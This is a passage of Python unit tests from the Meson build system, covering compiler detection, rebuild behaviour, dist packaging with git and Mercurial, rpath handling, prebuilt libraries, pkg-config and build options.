self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in c-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
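# The value contains spaces, so quote it to keep it intact when the flags string is split into arguments.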
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libfile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def has_working_hg(self):
if not shutil.which('hg'):
return False
try:
# This check should not be necessary, but
# CI under macOS passes the above test even
# though Mercurial is not installed.
if subprocess.call(['hg', '--version'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
return False
return True
except FileNotFoundError:
return False
def test_dist_hg(self):
if not self.has_working_hg():
raise unittest.SkipTest('Mercurial not found or broken.')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and that builds are reproducible, since the build
directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
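# Helper for the prebuilt-artifact tests below: detect the host C compiler, its static linker, and the platform-specific object/shared-library suffixes.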
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
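# Helper: compile a single source file to an object file outside of Meson, using MSVC-style or GCC-style flags depending on the compiler's argument syntax.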
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
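# Helper: build a static library from a single source file outside of Meson, using the detected static linker.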
if extra_args is None:
extra_args = []
# The archiver command is built from the detected static linker, so the
# correct tool and flags are used for both MSVC-style and Unix-style toolchains.
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
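# Helper: link a prebuilt object into a shared library outside of Meson; MSVC-style toolchains produce an import library, others use -shared (with -fPIC and a soname where applicable).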
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that we prefer static libraries when `static: true` is passed to
dependency() with pkg-config. Can't be an ordinary test because we need
to build libs and try to find them from meson.build.
Also test that it's not a hard error to have unsatisfiable library deps,
since system libraries such as -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
@mock.patch.dict(os.environ)
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix(), '-DLIBFOO']
# pkg-config and pkgconf do not respect the same order
self.assertEqual(sorted(foo_dep.get_compile_args()), sorted(cargs))
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
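# Helper: assert that introspection reports the build option `name` with exactly the given value.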
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java',):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
